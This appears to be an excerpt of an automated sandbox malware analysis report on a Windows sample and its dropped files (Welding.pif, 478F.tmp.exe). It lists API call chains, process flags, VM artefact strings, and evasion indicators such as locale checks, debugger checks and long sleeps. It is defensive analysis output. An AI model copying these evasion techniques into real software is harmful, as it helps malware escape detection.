Code function: 15_2_000D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_000D33B7

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Window / User API: threadDelayed 501			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Window / User API: threadDelayed 9487			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Evaded block: after key decision

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_15-136597

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	API coverage: 1.5 %
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API coverage: 6.9 %

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep count: 501 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep time: -356211s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep count: 9487 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep time: -6745257s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Last function: Thread delayed

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00114005
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE26E Process32NextW,SetFileTime,GetFileAttributesW,FindFirstFileW,__floor_pentium4,GetShortPathNameW,DeleteFileW,__floor_pentium4,	15_2_000BE26E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,	15_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD14 FindFirstFileW,FindClose,	15_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011FA36
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_022AE697
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_022B3B17
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022B4B77
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_022AEF87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	16_2_022B47D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AE077
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_022ADCE7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_022AC0D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022A1937
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	16_2_022B4107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AF917

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,

15_2_000C5D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001333000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Welding.pif, 0000000F.00000002.4150963294.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000828000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001245D5 BlockInput,

15_2_001245D5

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D8E89 _memset,IsDebuggerPresent,

15_2_000D8E89

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

15_2_000E5CAC

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Code function: 16_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

16_2_004045C0

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00430EDF mov eax, dword ptr fs:[00000030h]	15_2_00430EDF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00419750 mov eax, dword ptr fs:[00000030h]	16_2_00419750
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E2CEF push dword ptr fs:[00000030h]	16_2_007E2CEF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A092B mov eax, dword ptr fs:[00000030h]	16_2_022A092B
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B99B7 mov eax, dword ptr fs:[00000030h]	16_2_022B99B7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A0D90 mov eax, dword ptr fs:[00000030h]	16_2_022A0D90

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

15_2_001088CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DA354 SetUnhandledExceptionFilter,	15_2_000DA354
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000DA385
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000F66CF GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,	15_2_000F66CF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000F66DF GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,	15_2_000F66DF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0 CopySid,LogonUserW,GetSecurityDescriptorDacl,AddAce,ShellExecuteW,ExtractIconExW,SHGetDesktopFolder,SHCreateShellItem,SHBrowseForFolderW,ShellExecuteExW,DragQueryPoint,StringFromGUID2,CoCreateInstance,CoUninitialize,EncodePointer,GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,GetConsoleMode,RtlUnwind,FreeEnvironmentStringsW,SetEnvironmentVariableA,_memmove,	15_2_000BF6A0
